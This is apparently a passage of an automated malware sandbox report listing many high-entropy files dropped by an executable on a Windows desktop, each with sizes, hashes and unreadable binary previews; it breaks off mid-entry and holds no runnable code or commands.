              Preview:<?xml>_}...N.t..s...M..q $...JK.l...7b........j....`M(.%......QL.g..$.q..xS`..>8g..A.....N...7.-..W.U0...B...I.EN.E.z}+t..Z.O.Y..I....'...X.N..Wkx.(..nH...p......x.E..yl...W..H.]...F..j.)...tT..f....c.....H..{Q...$...;.. ...xr..i..k.1..J..m.."F\..s.M.....5j.{..S......U.3.....K............M.h.........I.......R.7.....9..v.\......f.Nkhm]o+.t'..].r...m.,H.n....{..j&.K....0f...?.7.-x....6...<JX.3X.097..`.Q....)G.........0.....,i.....0...`..........!.V.@..."K.@.....TBc...l.=......(.`J.y..y...3.....z.g..a.]...F.`U....h>;D......H...............8).[8..Z...X..-../i.T..<T...Z..m.l}..J.v..[..C.@....;.....K.i.......8Rc..is...K..gO.%!L.M[.T..{.|f..fMs.zs6....s1l..^Pw..2W$j....g...E.......G............oi......7~......9.2.Q.;P1....:.F...g..-:..X.Q.f...?.5.......v[.........#...d..B.}I....M."n?......Z............3D.........3......rt..n.....Rz\ZG.C`.U\.q...G8...R.L....._j..\...n$z..<.7......@)..i j..T7..2..J....[...r9#....s.~.!yc..P....IbzAf,....I.
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):1693
              Entropy (8bit):7.88681911644694
              Encrypted:false
              SSDEEP:48:IOY3KeQxZa/T6E5Lt2HkZoQqMKWbfKeW6ghy5gc2i4Vuj0fD:YQxZa76E72HSRqMrbfKe1ftYL
              MD5:5EEB7740B15639B973B5391EFA10C0B8
              SHA1:61DB78B322B3E0B527FAC4067444CAA03F4CCBD3
              SHA-256:4E6A381BAA848DC362201E09D4062EF17284796825B72F95FED8CC5CBFE6F251
              SHA-512:546FD215A684627CA1D26A02EF58E7A095DA49C86302BE7087B3AF6C3D4F025C4A6A8F97AACA0B392BBB4228105A2F427C230AF7FE0B9E5CA7E4BEFDA7F090CC
              Malicious:false
              Preview:<?xml.T....j.....}...l..U...+.....B..a.m..T/...;(.4l.....q.!.6.9..c.k.TJ11.q.l......(...;.........`..K'.+#.b.p.y~7UD..{v....J.Gh..j&..<.......|.n.}k..\^.......s..-.S.0..0.t[.V.@..8.p.F.....v0[...P.."...m...6..."p%6....+...2...>Y.-..dmL..].&....jK..*....E.*>..$Wv.wmG...1.&.......tT...NSr@......"d..e`..y.. .Y...........$N@..i.......=.....,.<.{..s..M~..u......u..cH.....,V.B.....Q....../1.i+./2.z.J..(.X[.$..o..(EO1.\..AW.._%....yP...x...8..>xM.....kO.......y..+....V]..&J.V...E'.*.N.......1W*h.. .....cgg...R..v..d.=.I.... .,..X.!d.l.zif....U..>F...._^....)^..?.i. .........U......{..&.W.?..?....B..O.@a....Q.hga.B.7RQ0.3...d.Le\...g0C......~`...B.H.86:...G.E\P.....L*..,=..JPt..7.fMtrr.+N|.q....t.<9.....q...H........2.._ZLI..P..y....i.N..q...i..9..K....!..."C,.u.e.M2.R..e.L.t&....d.x.na...........I..{.6.>o|@.+...7f..U..D....F../. .M..f^......Qj....q.t@l..A..@.7...v.*...t-.....z6....i.p'...nf.7._..JA..[>.Y.....q .x.........P.q......y.61..F.B
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):1730
              Entropy (8bit):7.89105797865266
              Encrypted:false
              SSDEEP:48:dgCGO2GOwjgeM25fmVoU1sJTp4JotOeQ4k8fLzT4y6v5gPD:sSgH3yuQOwtjzHaGb
              MD5:599F71B2A119DFC9AA7F6D8DE08EEDA0
              SHA1:B62176945CE2DC3A359E7A2C983A0D4027EF0DF7
              SHA-256:33A5B619ED30F90F4C6EB19006605EC8E9C284EDFB397AF65C357FFCD1523844
              SHA-512:25A03CF05029B0FC7FFE48E0C07AA9C765C053C9F4AEBD96CA34C0A22A7C1785B971C121D265429119BD657C928291FE1C6B512AD61ADB5FF69CF7D278B7FAA0
              Malicious:false
              Preview:<?xml.P....#si.W.ksY.....[.).)^#..a8....:nL.j.C6.a#...2......)f.<D.....9h..-..4.s..E.C.!...?.[...8.#...7..d;.[qG..m.....#t.Go.t4.:{..aT.s...zPd...pFEn...'...........!T~.)..W.e.6O....J;^...AzX,...;..[}.0...S....^...@.R.##.....w...7]Z..1.29...e%.\......R.p...!\zk.2U.4!=.. .7...@#yYw.#%d.aP.j\.$z&..>....^d...#..+...C:.G..Jd.".].BK#.e._..I....>.....9...6*......v..=}v.?....1.f,..QI...B.......6V..W..I.r....uzJ..=.n..9HU..z_.......%../#...+6.r)5.:.eO.9..Rz....0..".....d.;.s..u'"...&...i...M.........Dn...aI1.Xz.. .........d;......x.F2.B".H...[...6`jj.f...+../....A._..P.,.'...z.m.Be...{`MZ.3&...V5..;B.K..!?;d...##.@...&..._.[.u.......p.tn.....`Q..t........>o.@...*G."A*3......J.m7B........N..!f33.#.Crn.....U...nMfo3.B...KO/5v].....}tM..1.nk...kW.`.J. F#|.C..z..n....&b9.n..ZWF..e.h.*.k..lw..1."...:s..8...^....i-......n.1k.j.Q..$......,SsA)..!..%._..v....,.'....VR..5..`$.......k..IK..YB.u.....}.....:..$..L3.+V..I%sU^.x....I.,......E.u...C$.^LAQ.iPW...$?8
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):1711
              Entropy (8bit):7.878030125817453
              Encrypted:false
              SSDEEP:48:wu0v8cu2tzywzAwkkaifekqkJD99cuqKYYrNGqnHRD:52teeAwkkdvcJKvrQq5
              MD5:DE3E6A9DC1437394F4B817FC319EED90
              SHA1:BC3DCF5437124FB45506026C8EB68D39B4DCA92E
              SHA-256:9E797BA801DF85C3D83B9ACE07BE792A1306D0B917D9C8D3C2852966D744049D
              SHA-512:782377EBB524F70DEA1FC47DAD84449ADEBBD8B4E625FE64E00FF08C58771A44FFEFC5119B3CF0BB060B834854DDC20473DFDBF22DB1286DAEB84BEB58126269
              Malicious:false
              Preview:<?xmloM.ybS-..1....P........A.-....B......8...k...;QB.5...sa.TF.)>._..8..g{g.8.zN.|."wq.<.h,.>..M -.m...k("4....G.(.y.....U{........H.....@]...d..C.L.....2.&..*Q.+-V..M....D..../.6.....j.<..r.MXT.....sS.7..e..N.Co.G..k2.j..I.'`....]...^.q...7.N..w.4.`....6.y,yHE.X6...h......e......B.e..p._^}#....6.t..s.W....... ....W..../.x....C...>.z.6XY..f.j..[.Gi.Vf*...u..5.6n.P.y.p.gN........s....@.#h....u..Pq.w.G.....P...=\dwn..*....../,2..w`$_.>...r@...kP..*..KT..s...s..Wm^u+.@N_2.H....j..*Z.ml`9.N...,.U."..m.].7B....bj.V...>3../...W...9o........qu?x.'.09C.08..3.....g@..0..F.s{{..)........a..=Q.ZP%.n..)..qn...LG....Q...vND1..(?..WW0.A09d..fi.|......m.{..~......1~g.P..]O..k...X...T..whq.3 ...]..$...S{.A.x5...Q..I...\~)..{M!..u..|....N.a.Y....e.....)....Z.@.QO.W........#S.xx.4orL...cq..].......1.............].m{... ..^H|....t.Zba1..qjk..(.......k......oOD{........hh?...*.....P.*..c.l0;G;#.........l...mM.. ..8V/M.. .>.....Z]@[#..Zr.H.!....e.....'7x7:.-.
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):1748
              Entropy (8bit):7.892749224313454
              Encrypted:false
              SSDEEP:24:kZ44k4rik+ZpMgsTmammL7nQk2fHDuXq9odKQFIWzH7OoLqKxPVbxIwr5MCQ7o+w:S44k4svsX5QvfyXqIFIKSor1lxb+k5D
              MD5:DE5FC06270B75F2DDE73670779C85345
              SHA1:1FE3BE7286926BE565D1FE70FC6F6870B20CE1A7
              SHA-256:D7E0EDDAD2942C6DAA74AF069BC10E39B7030E99F1F65C35790563852388B637
              SHA-512:3F95D44E3A4B34762051A4709522C0667005652EA0FDBFB24D49676339A0E12041C82CB40EBEE847BFC560AF9B76FEBCBDD84AEDAB381A670F81E589A1CA83CD
              Malicious:false
              Preview:<?xml........9.v1.v..<=...O...x...]..........yd...jR.]-.FN.1K....."..........h..Ox.W-G.v...*F.p..........4..@....?q*..[.d...?JE...C..J%...P.Ar%Q...2...y.Q....\8l.}..x.....s...@.....A.0`.!.8,.CV.\.4.._.q.....x....umV.......\..z1/.Ij....CM....K...*..cC..x...Q.tw....l..?...z....1..9J.+5.&~..H.....Ld........5'.aw.a......}hU.8..?..?<...*...>q......iPt...|2Pl.../...E.F!r.%...."j.(..T.8.i..?.A4]..R.t.R.H..=..6.eG..[..ym..{K.K+3N...fWc.=.&I.8...V....m...VT....... +:.......@z..+.-..!.v.6S.../.D&.....w....l......k...w.e..<|0.l....j.Y...{b.0.w....jvx....&d..D+.6e8.7..)sE......Rn.@<.|>.q......=f[kg.:IJ.Y.k.?......~oR.b..T......:Ha..K...^..........36.nMZ8.t.#...5....a[c...&....0..3...`-.1.&.U..+.*|...3....P.............oC.d0Z..h...#.....:..W......7.Eh.l....d9...r0...r....Ip...> .2..Jx]..p.s}.Wp..f......A...(4.:..h{.\.$....&a....\t&X.B:....u.u.?{4......T..4.f.b...u?....\.D.........R..s1..|......T..R....~."/.fW_R.I.*..\.@dU./X...9...{|.AF......
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):1733
              Entropy (8bit):7.877276299278166
              Encrypted:false
              SSDEEP:24:03MZeWGBA7Lh3s/niZodYuafrnfQzf15G/yJa3LN13wlT5YbF8x4Yoc8N/PPCe8W:5e1BA7FcKZoWnoZE6QR13gWDW8ZCduD
              MD5:A9BADBACE727D98E2372D24E401F6F48
              SHA1:BF5AB86671727E9770372B6C42BB0BF3C73DEE59
              SHA-256:B75453FCCB4FA82BCA610E0DE47701753BEB923E4CED4C6C23F265330CB8D492
              SHA-512:E70FACB94B6BC727108AEC9458058E6001BCB891535C49BE11D425C8484C1760C532F3CCD1BC6C7D4C9FE5695E9673B3C409252F56339EB6FE992DFC491F3863
              Malicious:false
              Preview:<?xml..>.p...o'....e'[."Y...byQw..\......DNe{.......<.#..r...X<^0UP#.....q.&.[dYBj..Z..eiv..o.a...4;.,?m.M8.ls#.Y[.... P.F&$.....5}.....f.{}..[.V>a6.|Sg.r...}.p.z.!..J.V.z,bA.,8..,Dc9..{.v...=...@,B.\....^Pwt.u_.CE..B....H....].A"..Q.u..,J.{~...+0.d.F...5......1....o...N..$42!.r....Q_>.K0%.........C].MEL$.:L=".>o..1......|*8 ?.^'.6...[.......W..*..[............`)."{..Mh9.C.-A......lM3...P....yF..r............./...E.G..J.w.K.5..E^....g..i:.6...w..3.q...5...m...#).=..i.R..../...Ms..ln......n..l...Os.CV_....p...v.ik.....p<.z.......6..A...0...b.|_.R.).......(.]..&GY.$K%.4 ...V....7*....~.(..T.:.@e..Ip}.&.m..d..n-p4).qt..V...Y..Z.I.D...#./.7....O..|....b....h.../:.B.|..B..Z......U.....R6.[....v...P...U0....(..H.f...,..y7.iL..k.q.p..gx{.y..X..m..O........~....6.WRG.J.&.VM.... .{=...B.`}..-..........E...,~...0.e....U...#5<8....[..[....gf..0.+.....q\V..........>..h.Z.W.`o..x...L.<.....1.iMJ.D.-.[_...Jh.{9....Wk....M.i......_.!.>b...lB...B.B..
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):1770
              Entropy (8bit):7.8919657687405245
              Encrypted:false
              SSDEEP:48:nKZOIWXVwIMmcxqVboGettI5S9XXsY0SkD:WOvFMmcxqVboGeteS9X83
              MD5:4E655F23BE7FE235A706485613E02ED3
              SHA1:E78A2529EE6A27A487CB499C2137EDF4C5AB15ED
              SHA-256:5DC17D28EDAFE6CCA3CE1DDD67E9E2F70E61D251F16FEE48C924B4B2F6B3032E
              SHA-512:F06E43613642DD78D60546D654C757E6D4B2177B3257327CE1332A558F01EDF432A600645A0874076464BA2B89524994D72B2AECC9FB7DA28A264327EC721627
              Malicious:false
              Preview:<?xml..a..v..2.`.h.%.!&.F..S..n[;.j...WCS.Q....+b.XA....<.8.9y.ZI+d...!..'r]|..HL..........p.......]..?|...i.U:|.vtC..*.?..i ...0t..C..a..O.n....n.Zm....:..0.i.ey.:V..jO.(...............|7.>...;q ...\.+d.D....!<....P&.;..A~ZHP....t.'\.g..n......1^..(J...+J.(.Hx._..........t..`.1..qmQ.u...T..>.;Q....`>....#`.(..h.$..T..6~.w)4L..&U..4=.......g....q...#L... ....UN...!....|?.J;'.o.G/M....N.....H2c.Ef....R..sp......`......B_x..n..w,..b....aK...m_..{.A]..B....(.:..\e.......A)..O..3.lXc.4...{.g3..b..3[...Q..(?.c.ma6.......8.Ml.U..5..Ca."...E....#.Rv.w-..v....U.u.D.R.N$tA.;g...@.?..c...7...'&.I...`..B.[..O(..d...<.z..>..s..ko.^..$..9cgjio..G....A...>..?.....c|=.p..Qga......nb......~..,.m....n,/....Q3~....9.A....1v./I..(<.....+.;.y..V..J...H6......4.$c.RV.X....(.,k..y.p.!.Zr....6..[T.(..uft..'J......K./....!?)......3.z.@j.......6.g..u.B..2.43....W._51X..L..../...|.0.....]..I....kvlM.%.$&..$.Y.c4_...X=....t.g...........|......dy.*.|....8{K....8...K...!
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):1715
              Entropy (8bit):7.8515564235248965
              Encrypted:false
              SSDEEP:48:v4JYXnpCiVUFcYr4xaDRgWll1o9F9jd0Nj7lD:v4JsCiGXrLgWho/9jdo5
              MD5:9060C549DD46D8975C000CD2F199C546
              SHA1:2495D78CC4719CDD1687FEF0AD27FE1C81B2BDA9
              SHA-256:2E971E6535B756471A03EF365F859FF6E475B6A2A11D9FF6638254C6F20E7C80
              SHA-512:8A309527CDF32108E2195A2F306AD61E8FDF820FA900BA568B35187B8E345DAB0DDD2956AB4012B579C136FC4C0C84BF80C978406347F8ACB025155D4C2B9D67
              Malicious:false
              Preview:<?xml....6s}g^...f>.Q}.c..sY..0G...}h.lf..a.2...c9t....X..QF%...7t'E......U...F/.!C..<..x<.7.......*...-...P...4..$t.<.e7.9.m..CU......nm1@B.|*..$.w.....s.vh...5.+>.0..pE..Oi...;.M.....}......6[+...O#.xSv.....X.?.=...w.r..9..V..|#q...!..q..wU..qC.s%G....I...6.F.Wv.o..S[.......j..N.$.....y.....e.'.s(..t..q.,.q+.;. M...".5..?.Jw.A........L....M7...G...Q2..I..I..}..1....(]Q..W..*pS1..B.5....... ..l....w.K.[....,R`.RW...vFG.3..m).F..&..(.p.c....|Ov..z3|v...X......e..X...o4........r.e%E...T..j=.C.a..E...H...?9{.6.iD..r....FA.6IuL..3.M.. ....j...(w.A..q......VX.gA.c.`..4...($Y...U..K0.L3dR..Z..d..v.L...!j(.......j.8.:...[....m_.B..O......[$R.k.1.k.7..-.G.).K1A....zH.]n...z..2SX..W5.t.....m.iP2.C..A...4.u.(^..g.Y@5.b...v:M....f..P...q.9.....x.....:.Z..{.$.;......n.....[=..%...LB.........A...t..BD.Z.. ..4.o.....n..'.....&.i@s.gH....M.^a..td.&:...m.H.V.x4^b..%.=..>ql.H:...3.,f^hj;B..pL.r.X.%.1.X...X.~q'......)}...5..._.V.9.Oh...\w.3...PG7....Ti.
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):1752
              Entropy (8bit):7.874709390032407
              Encrypted:false
              SSDEEP:48:gxQIkG6PAEo5eR3rM3/srX9OYt9K8KXHm8oB7Ki1lD:PGsAJr3Ur9OU9K8flpKYd
              MD5:B92C8870957DC66077DD03090A70409B
              SHA1:A798BC453F88B86CF915A39B6C0426463C2733F8
              SHA-256:89374F372727E46C35AE2A9757244551775CD79DFD251098A885448326D1CCB1
              SHA-512:6C8085103A8D39EE4EC004FE2FFBAE0B6795B59ABDBE21765485E45F3921B9137C7F97BCFF796A0C3D860EEFD6042F639C8E8A95C0D97C410EE75A534C4A5926
              Malicious:false
              Preview:<?xml.*.NJ..*........-|'1...........$.....si.%...HR......:&.dw...:.f.I..U@>..P])..8#...;22@...S...........*Z...ln5L+...N.....N...{{`.W..........).E..r..2...B0.K....j&...N}s3..&D@...?...U{...9r.6.T>..kgN......~./.h..(r.,.i......YU...0.'....0f..xf..M.O.;..8.0Q.....N.h.=-|#...;....PL...n]..........F..G.4b~J.r.< ...-..5..va9.]"6.:./....l.T.&c.x.r"?.r.6O......o.._.tU....~...h.h.:!D.(?Hm.g.W..G[*j.huUo.h......B..p#$...H..l.2.D.zd........k..S.^...c....Q.Q.?Uk..."^.9$.....:`/....x...h.NYw....&.4:.#.i2...~]..K[9.N..P...mrf.)..z....=B....3....F.=..p......`....Nc.F..R.\.I .....}FB...j.@K..P.4.|....r..A!.z...U.4@....h5....nF.@..e....9....x.Rc...[H...I.]].h.....,x...u\.%......<.H&&.cD..zz..T.b..[.._.".[tn(/..i.D..5E ..`:.n..E.U..y......+..d.vr..uS.....(..<..../.U..R`]L`..\j.,...<........S;..'J.S.....R.iy.N~.\...[.. ..H.G..v..0.v.@K>.../.L.]....L...K.[.NJ.7.I.[......b...%..:.k......R#K..{...M..7...$......}..H...&.,..2R(..qx._.....t.t.wMx....\.
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):1738
              Entropy (8bit):7.875622270945443
              Encrypted:false
              SSDEEP:24:GHefourEyTmUx3KtF4258FoCKrKU195+wnlNhjFBIXNemNOhn3WJ63P47UbaPiiW:GHArEyTmUvTFuKU19rjBIX8m8q6/c2nD
              MD5:345C65E19E9F813FC3863E045571C892
              SHA1:C85D5C4047C45B9D75EA49D39E681A0F1F909AD0
              SHA-256:6B0F04D9CAC55916CDB8B8CFA9A9270EB9FFC30F13F33A6D4E0A152A79E7DB90
              SHA-512:F1094A4E040114F41EFE85BB07BA4D207E81D458CF4E71083201AB667F2713596649C4D1FE3B999F8DC635D18EB6BC9E0C157679D6BFE3C4396252554FED3B10
              Malicious:false
              Preview:<?xml..........l......,...k......ZE...+.......X>6~.qT..|.1b.uuk.?.8...8...7..,.M.H..Dg........H...j..."...I..;.-n.........0=.....@.o....A..9Y.x.....vM....#.:............... /.~J#../.M.~..|C2.-b~0..7.....#...Y...rV/b.}....|3.&...U........k..5H.7..f:B9...e.8b...7x.........$..Y.t...4..24....*..F..G=.V..j.....8.*.....vVG%].F.Q.........V.I.......#i..O.....9.l.>{..?Z....P.o....t...n;"....._..F.j~....O...U..*.x.3../.a..V..?.(/...M..iEG.}Ja.MnY\...=s`\...k.=.H...{.\...^.(%q1...-..Z..;..c.:.g.e..T...OX..^;.&....l..wh.AH.8.2l....;.Q......?..[-.N.S.$9.y.!.od..4.v..@..1........(..3.N....2.a.y2...;|4>...}Q....m.:9.N..[8cQ..........R..mG.5..=.....P...>jR.Y5X"p8....&..Dc...M...CI.E$.l...>sW.......C.G#r_..i.c........M.AJ%SO[....{...?.M.+.....................,.m.|wo..7...1..x..=.d..km` ..R...{.z..l....!@&.F.....=Ru,.n..1Y>.........m...C.O.}.`....>..az\..\..RJu...u.......Z...z;...Q.}WF..n.0...O..M.q.{..T&.m.._A..9..p....o..1.4.AR.y....y..r...|.;)\|....Wtv"_
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):1775
              Entropy (8bit):7.880258352293172
              Encrypted:false
              SSDEEP:24:V5YfCCd5edORGHVfMuyoCr34Vzu2IYdnLnUQVTtCOW6huGoz/GTsYPrljojQ5wnR:jYfxq/Myo34t9zOD8uGo+to0CyqKOpD
              MD5:C6AC986BC3FC0C4240C5ECF94D112939
              SHA1:8F1A129CDB35DFD6192402813B9ECA6335A50985
              SHA-256:46387E3DC85A4B49CCAFA6D952363AA618CD4FA32CFFB35ADE29C4AD641A6E22
              SHA-512:E0B6432B36BEDAB793722FF6BADA85DBA4317506773DBE43AD5988CDABB6C5E75F42B4D75DF7E0F2A5A6D5C4175327C6F126161D2DB2A1773C12C9365EFF933F
              Malicious:false
              Preview:<?xml.H..3+....m}v2@Et.r...d....n.h..R"..cm.U.....e.(..a'yl..z^8Q ..:[..Co!.;.n#.(.9..l..In...:2.gY)....>...J......O. X,...v..@..l..R.v..KhrB..5......T$V.........#7Z.......AU..<...@...-|.<.0.7..,wmM+.....1[.~..e1.WC...u...l._q....."r..BB...f.|.N...7.....&Zw)4....2.8A.+B..V.P..m9..O..9.E.Vy...is.".-.....;.(b.M...*h..\..o.o..6...%d......6..."4.0<...+.....5.~;............2I@Xc...b.....D.t.F.E".[8....tz\..QJ..c...~.k. ..(.d.f:...Y.9LNG.........].z2....O..V)"....g...{.].?..._A.2P.8.H2./..x.E ...)..'21.Q....Xt.yLdPyCM*..1S..d.1.Z.G.sg1}e&...V.`{.n.......OQ.Q.j....e.....Lt...C.#.......U4.at..].s......{...e=X....t)gDy.^.r5'.../..4.R....e.....W.b......di.#...=.:........o....i~..]..F.g.."..B................}x.+...Q.;.._..6..n.y.L...1!...>.......|._b..jjn..,.B.:.....z....W....c.l..u#Jn1..~b....@.1....S..I......a.E..E{ZT}.=......|.CtJ..?'.. ..(..0....!Y....`PW.E=..B.3e..:vtq..c.J...<.t..`u...[_.^...g....\G.u.wU.Qi.....7....L...C...A...z<.gBe....T.
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):1723
              Entropy (8bit):7.865714942285185
              Encrypted:false
              SSDEEP:48:bBZLXHKdmH3nF9BJkvvj6f6r9Q+njqxIKuGCiD:fXKgnjkvb6fkDeWK/1
              MD5:1FB89DF3147504133D7775FD3C15C91A
              SHA1:16114F6E54D6B52DA549C3C78F4EF4AABEAE4F88
              SHA-256:CF6BFA3D247684C2832EDEF547C528250C226E288B13D46CD0C912176999AD60
              SHA-512:65F731599F4CC25AE44DA9006A538DE1F0B2588F0D21246F3B943BE8381B2F407378EC0DA99D88D19533BF12B721DD96C35CC88EE45E65A2ADE218D813960A3E
              Malicious:false
              Preview:<?xmlKU^.....y:1..@_..p....*...W.p{..v....4..............7..b.g..Vq:..\Z..,....;.N....wg....5.....n.?l..Y....8s^....t.v....M......5..XTp%.~g+7....{...U.Y..;1.j.P...+...cb.fL/...y.._.e.SwDW...K.xg...O.q].@...+..S./a.zw;....|[..Yq.ip..\. .l.p].Clyi\......U.0..ZHH.T.{...$z...??1+.!<..=...s/...Pt.uC.".."........>a...v.v.YO.UA..X7..mhl.1..Q..RZu...P...5...bW5.LYR.`Dc...)y0.8.....&>..X....|.>.a[.{.[XuSiD.{C..H......3 &X2...s0.h..sJ......o.y.P..6.sr..3...~$..B.t.@'..&..?i..&X.7..w..e.4.a..........0.g....$..D.....:k}.(H..P6.;..Q.$i{..mk..F...'.."....j..W9..T.^....q.N..v...H..t..dK..`..A.K.~..1!...:..X"...[...,..C.2..B.8!&..`6..o"...%N..1I.e..............p.......z..........7..>....)...6............2.b.aMK..6...)SDT.w..e.5mA..5=.Z..h.i..Q....!.....z.....w....q..o...!.B ......|J..94..sVWR{.tO./`...M.Y?.+....0HH._=m...3^."...~^)..v.w3..N%...r..{T..l0u...fc%..O...G....x../:.Lc...e.6VCX....... ..S..........kQ...q.!.c.|..o....Jl..j......"+..z.6..[.r.,z
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):1760
              Entropy (8bit):7.907922069557736
              Encrypted:false
              SSDEEP:24:rOdPtqVRjvqAqCBJd6NMDFD78m/JEk5/pXxuxpuFcydMzqa6kblQZuxbD:SPtkFvSCN6NMJn8y//DcyS16Kl8OD
              MD5:FE5D7A2D57A541E44B6CB48E9419CF53
              SHA1:82EDEF69198F9BE4938A7C704E382524D027E449
              SHA-256:BF3CE3D5B2C888E55F13D0E09AB60B969F8E02E004A8B15BCE73BAFF116A11BA
              SHA-512:0224321B90C0DA82E0143936B7578041FD25E32F2C0EF8BC218789204CB7EA88CA929F90091B4FB87F9AE6F2CEAF7C643BB6E35901017C617016E706F8495729
              Malicious:false
              Preview:<?xml.....`.9o;..L.2......)].g..Ef...............>.-.7F.h.......+le...K...2.zQI....P..;.'..T.v.....r. (W........J....}...5..f..x..X.....jz.....DBG..!2..t-.7..c....;..(....... ...U.s.[..A.f.[..9.xk1.aT.o.....;T.1P(..d..b...z.i9...9....d..H..RVF..n..m..e...q:..RV./.';.c...~....7..wr..w.A.j;.e..B`Z..S;6E..E".y...}...h;..o.<M...&.<&^...iMjN...5..n...]....T,...J..`..b..6k..@8....5..?..:....M.....Tf.w...Q._z.....;.c.....F................u...1...j..w.t."P....z.U.......E..)......rw .+....nqYn...:.U...&._.]...PVu.,-.4...Oo_....d......<.U..,L.....\......+}.2.(.Y..jM.....Z.O..N.r.)....6..s..c.d.".....5|c.4(...\.R/../..F..%k...b.;AD^Y.-.a>.....^+..,c..YB@O[P9.l.<O{.....sZI.`.0..Z5....44.Z|M.7F_...Q.ca..lc...t..2..\...1.....#.......u/....\.I)11..~3....~../.......X....{@.....I..-..v01..._.eS.s.D.@....Uhl6r..L.n.?.S..)[?\v+.........u_d.&I......R`....}.=}5.h.8..4.jf.D.E...&(.w.sw......y.,.++..LL....f.?o]........T...h..K.K.b.....sE.p...b]y./S*D..".?..._.K.....
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):1699
              Entropy (8bit):7.889298004573505
              Encrypted:false
              SSDEEP:48:KLDbyAbE7/dWJdvUetyT6smSnstErEWDyD:KL/DbE7ofvPtsQzWDa
              MD5:4092A8654F07A9E1B6DF2E5D366E8EAF
              SHA1:93B70161A3CF651D8808BFB4D614198678D5F5C1
              SHA-256:3861EF77DA335BB0DA4B7DD19EC554BAEF40AFE1E5643484019375CF0E3D3CEA
              SHA-512:109A982C482E4DD35A57A4909C6EB14F064716E72FF44D80408D133CA98A986B8568F2C8CBE4AADFDA4F0844E0BD00A6D4C89C258DA428769FCE1E5DE8B5525E
              Malicious:false
              Preview:<?xml..%.(:}..d^V.......j.........K...|,..R..k.H...X_.G.."}.t....9..B..z(F._...@........v$.yA. ..z....o.z.`..'QD.K.?.......P..^....1...z...1..1....~.R.........@........=B.$...%...._n.AIkS..+a.5....."S/`K.J.".3....h..g.\.....:P.~.._.9#.w..#.....R+.6..>Gg...H.....D.0......'.v>17....XQ.Rp\.77TW1...;.%.)..o/`.e...1:..>u...3..].M!.1.x..$u.z.)........Nb..Z...p:..d...x!A.D...P..x.eI.f.%i...U.LM@u..u.%.'._..b.!...q..l..E^....:.H.L...........gE..$:Hl.b"./Ab.Q.j8.J....#=.<d]y..+.3.... ...:.)^..X....*@B..l-.Y.)7-^{.."..jf.a.7..I.3....-..no.Yb..E..+...XwX5...1./Ia.P.~........r.[#...n.|...Mm...i.....3.#.-..x7.^......$d.\.p~...4..!A..G}.*.&.0..>.P .\'..i+Y.v.>..N..K.J.sC.(B.J`.1+:...SWP....Q..J...y..4..t...[....rGR......x>&..y..n.|..Zo...KY.m.$.....?./...<...~..... .ezb.`....x83_........)+x..`?IM.a......."a}..jo.&.....}%.....@bW.t.<..s.B..3+...G....v.Z[.+....V.@..... P.....H.>.D.\.............7...6..... .k.E.....0....".9m...D.......a.T.3.......Q.g..f.;X....n...
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):1736
              Entropy (8bit):7.882088140829443
              Encrypted:false
              SSDEEP:24:Zct9ibpAXsDePrpXw5YP8KneYzOC3HOk9mzyze+hOepgo/Y6jPBMd4vihs1U7qfk:AIEVPrYYkKne6O0H93dvbBMRwU7x1D
              MD5:F34348F94DCFDA34AC9A4EA6C1844AAD
              SHA1:64D25D3520168FBFCF5F6DC32967488E982ED52A
              SHA-256:10D42451A82D227548034D505889478A87CB801E4482DAD3665F3AFDC05B4E4E
              SHA-512:2C2EA808A9D20532666ED40E22536D41B163D229062FE748FC98CF0CF370DE42300948FA591E7AAC085BFF95B26333C676567CBF9ACBD71DCBBDCED308C59F11
              Malicious:false
              Preview:<?xml....[_.r...6N.r.p...$.../..e..F;..,.@..c6..?.Nj.:("..o<..Yp&Dx:?...w..Z.8.Z8.6p<.pfT@...~.....R!l.(=8[.l......O.v...mk..0uB.a.k.<...Z).e.....S..<<..L^kA...P.MM.).|.9..n&..8[..G...Vj....%..../.R...|.vQ..'T....b.3<..F....L.W...>.m...Cst.9,._H....:.{.#...qc...f.'....&FZe....>`.M..?A...,.Sb....N.).!3_c\.J............%\L.?R-..gXG%.9...-..:..Os.W|8Z|..."V$V..aR..h...ci......Jw..........~.S.P.G,...OY...@#...9..|.{/......l^..7.i.;.+.......u..ZXc.oX......"$0#.=BP'.Z..66..f}.Py..U>A.L.9./...7....}V.Y...Y|Q.:...Y...AB.y...e{v3.`....%z.@G.B..y*....!.....M....d..3..._.)..^kn..1...E.9.i..n...$1v6.^+e.......gqw.k,...9O.c..S)...ii..T.4.*La.3.....u......rr...5.8.I....*c..O...9>.^.|..v>........3.X.,?..A.*.O..--...U.B.'M.#8...~JG.w.o.z.Q...b.....X.e.Z....l.Z...:.Q....N!.jv....b...M..vB;...:}i..M....)T.Q....U..fwJO5m...../v8.U...OX,..ow.j.Cs0.C...c*.i.]u.....<..K.9.O..].r..`vl....&n......[....4L.S.f...L......2.GL..M.uV.,_....j....v.i.K'..qF.....1Q.
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):1715
              Entropy (8bit):7.901993186758159
              Encrypted:false
              SSDEEP:48:r99+Ffjxo7wP7E9sLMMDoPKxP4dWXABu/KOCplt9uD:r99+VN1P7KslDDP4diSGCpNW
